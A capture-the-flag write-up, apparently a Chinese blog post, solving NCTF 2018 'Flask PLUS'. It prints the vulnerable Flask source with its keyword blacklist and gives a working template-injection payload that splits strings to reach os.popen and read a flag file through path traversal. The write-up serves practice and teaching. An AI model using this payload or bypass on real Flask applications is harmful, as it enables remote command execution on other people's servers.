0%

[NCTF 2018]Flask PLUS的题解

2025-09-24 20:00By
BITs2SysPlayer0
SSTIPythonFlask

Problem: [NCTF 2018]Flask PLUS

通过SSTI可以得到源码:

#!/usr/bin/env python # -*- coding: utf-8 -*- from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory import os from urllib import parse app = Flask(__name__) @app.route("/") def index(): "主页" return render_template("index2.html") @app.errorhandler(404) def page_not_found(e): def safe_jinja(s): blacklist = [ 'import', 'getattr', 'os', 'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'for', 'subprocess', 'file', 'open', 'popen', 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem', 'getattribute', 'func_globals', '__init__', 'join', '__dict__' ] flag = True for no in blacklist: if no.lower() in s.lower(): # print(no.lower()) flag = False break return flag template = ''' {% block body %} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>%s</h3> </div> {% endblock %} ''' % (parse.unquote(request.url)) # print(parse.unquote(request.url), safe_jinja(parse.unquote(request.url))) if safe_jinja(parse.unquote(request.url)): return render_template_string(template), 404 else: return render_template("404.html"), 404 if __name__ == "__main__": app.run(host='0.0.0.0', port=5000)

Flag在 ../../../Th1s_is__F1114g,比较奇怪的本题似乎限制了单个字符串的长度,所以路径可以这么写'cat ../..'+'/..'+'/Th1s_is__F1114g'

Payload

http://node4.anna.nssctf.cn:28442/%7B%7Blipsum.__globals__['o'+'s']['po'+'pen']('cat ../..'+'/..'+'/Th1s_is__F1114g').read()%7D%7D
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有
加载失败
广告
×
评论区
添加新评论